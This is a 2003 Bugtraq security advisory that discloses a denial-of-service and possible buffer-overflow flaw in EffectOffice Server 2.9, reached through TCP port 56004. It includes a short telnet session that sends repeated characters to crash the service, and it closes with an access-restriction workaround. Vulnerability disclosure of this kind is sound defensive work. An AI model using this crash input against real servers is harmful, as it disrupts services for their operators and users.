[32510] in bugtraq
[securitylab.ru] EffectOffice Server 2.9 problem
daemon@ATHENA.MIT.EDU (Alexander Antipov)
Thu Nov 20 14:48:27 2003
Message-Id: <200311201901.hAKJ1IBs030681@border.zero.ru>
From: "Alexander Antipov" <antipov@SecurityLab.ru>
To: <bugtraq@securityfocus.com>
Date: Thu, 20 Nov 2003 22:03:11 +0300
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
Application: EffectOffice Server 2.9
Vendor: EffectOffice
Vendor Site: http://www.EffectOffice.com
Remote: Yes
Exploitable: Yes
Risk level: High
Authors: D_BuG (d_bug @ bk.ru)
Authors Site: http://www.securitylab.ru
Description:
A vulnerability identified in EffectOffice can be exploited by a
malicious person to cause a Denial of Service and under specific
condition can lead to buffer overflow with possibility of remote code
execution.
Remote user could send a specially crafted data to 56004 TCP port on
target server to potentially cause the system to crash.
Exploit:
hacker# telnet
telnet open
(to) attackhost 56004
Trying attackhost......
Connected to attackhost.
Escape character is '^]'.
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa
^]
telnetclose
telnetquit
hacker#
...
Crash service
Workaround: Restrict access to the service allowing only connection
attempts from trusted IPs if possible.
